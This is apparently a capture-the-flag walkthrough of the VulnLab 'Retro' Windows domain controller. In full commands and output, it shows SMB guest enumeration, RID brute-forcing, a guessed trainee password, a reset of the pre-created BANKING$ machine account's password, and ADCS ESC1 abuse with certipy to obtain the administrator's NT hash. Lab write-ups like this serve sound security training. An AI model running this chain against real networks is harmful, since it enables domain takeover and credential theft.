Retro
A Windows machine on the VulnLab platform named “retro”, categorized as easy difficulty.After gaining a foothold, we compromise a pre-created machine account and exploit an ADCS vulnerability.
We start with a classic Nmap scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜ retro nmap -p- --min-rate 10000 10.10.109.4 -oN port.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-23 13:34 +04
Nmap scan report for 10.10.109.4
Host is up (0.14s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
9389/tcp open adws
49664/tcp open unknown
49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 20.63 seconds
When I tried NULL authentication, I didn’t get anything, but accessing the shares using the guest account was possible.
1
2
3
4
5
6
7
8
9
10
11
12
13
➜ retro netexec smb retro.vl -u 'guest' -p '' --shares
SMB 10.10.109.4 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.4 445 DC [+] retro.vl\guest:
SMB 10.10.109.4 445 DC [*] Enumerated shares
SMB 10.10.109.4 445 DC Share Permissions Remark
SMB 10.10.109.4 445 DC ----- ----------- ------
SMB 10.10.109.4 445 DC ADMIN$ Remote Admin
SMB 10.10.109.4 445 DC C$ Default share
SMB 10.10.109.4 445 DC IPC$ READ Remote IPC
SMB 10.10.109.4 445 DC NETLOGON Logon server share
SMB 10.10.109.4 445 DC Notes
SMB 10.10.109.4 445 DC SYSVOL Logon server share
SMB 10.10.109.4 445 DC Trainees READ
After that, we connect to the share using impacket-smbclient and download the Important file.
1
2
3
4
5
6
7
8
9
10
➜ retro impacket-smbclient retro.vl/guest@10.10.109.4 -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Trainees
# ls
drw-rw-rw- 0 Mon Jul 24 02:16:11 2023 .
drw-rw-rw- 0 Wed Jul 26 13:54:14 2023 ..
-rw-rw-rw- 288 Mon Jul 24 02:16:11 2023 Important.txt
# get Important.txt
As we can see, the IT team is frustrated with the trainees constantly requesting password resets, so they’ve been given a single shared account.
1
2
3
4
5
6
7
8
9
10
➜ retro cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
It’s possible to enumerate users by performing a –rid-brute attack (you can also use Impacket’s lookupsid for this).
1
2
3
4
5
6
7
8
9
10
➜ retro netexec smb retro.vl -u 'guest' -p '' --rid-brute
SMB 10.10.109.4 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.4 445 DC [+] retro.vl\guest:
SMB 10.10.109.4 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
<REDACTED>
SMB 10.10.109.4 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.10.109.4 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.10.109.4 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.10.109.4 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.10.109.4 445 DC 1109: RETRO\tblack (SidTypeUser)
We crack the trainee account’s password after just a few simple guesses—actually, we get it on the very first try.
1
2
3
➜ retro netexec smb retro.vl -u trainee -p <REDACTED>
SMB 10.10.109.4 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.4 445 DC [+] retro.vl\trainee:<REDACTED>
We check the shares again using the trainee account.
1
2
3
4
5
6
7
8
9
10
➜ retro impacket-smbclient retro.vl/trainee:'<REDACTED>'@10.10.109.4
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Notes
# ls
drw-rw-rw- 0 Mon Jul 24 02:03:16 2023 .
drw-rw-rw- 0 Wed Jul 26 13:54:14 2023 ..
-rw-rw-rw- 248 Mon Jul 24 02:05:56 2023 ToDo.txt
# get ToDo.txt
1
2
3
4
5
6
7
8
9
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
The ToDo file includes a note mentioning an existing machine account that was set up in advance. When such an account is created with the “Assign this computer account as a pre-Windows 2000 computer” option enabled, its default password is usually identical to the account name in lowercase. If no one has logged in with this account yet, we have the opportunity to reset its password.
1
2
3
4
5
6
7
➜ retro impacket-changepasswd -protocol rpc-samr retro.vl/BANKING\$@10.10.109.4 -newpass xpp
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Current password:
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
Verify the credentials.
1
2
3
➜ retro netexec smb retro.vl -u 'BANKING$' -p xpp
SMB 10.10.109.4 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.4 445 DC [+] retro.vl\BANKING$:xpp
Next, let’s check if there are any vulnerable certificates we can exploit.
1
2
3
4
5
6
7
8
9
10
11
12
➜ retro certipy-ad find -u 'BANKING$' -p 'xpp' -dc-ip 10.10.109.4 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
<SNIP>
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
We noticed ESC1, and since the Domain Computers group can enroll here, the rest becomes much easier.
1
2
3
4
5
6
7
8
9
10
11
12
13
➜ retro certipy-ad req -u BANKING\$@retro.vl -p 'xpp' -target-ip 10.10.109.4 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'RETRO.VL' at '1.1.1.1'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.109.4[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.109.4[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Now we can authenticate using the administrator certificate.
1
2
3
4
5
6
7
8
9
➜ retro certipy-ad auth -pfx administrator.pfx -username administrator -domain retro.vl -dc-ip 10.10.109.4
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
That’s it!